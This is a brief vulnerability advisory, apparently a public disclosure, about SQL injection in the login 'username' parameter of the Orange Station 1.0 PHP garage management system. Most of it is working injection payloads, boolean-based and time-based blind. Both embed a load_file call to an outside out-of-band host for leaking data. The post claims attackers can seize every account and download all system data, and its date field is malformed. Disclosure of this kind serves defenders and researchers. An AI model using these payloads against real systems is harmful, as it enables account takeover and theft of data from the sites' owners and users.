Orange Station 1.0 SQL Injection

## Title: Orange Station 1.0 SQLi## Author: nu11secur1ty## Date: 0.16.2022## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0## Description:The `username` parameter appears to be vulnerable to SQL injection attacks.The attacker can take administrator accounts control and also of allaccounts, also the malicious user can download all information aboutthis system.Status: CRITICAL[+] Payloads:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: [email protected]'+(selectload_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: [email protected]'+(selectload_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND'yPPS'='yPPS&password=rootadmin&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0)## Proof and Exploit:[href](https://streamable.com/sz3tfi)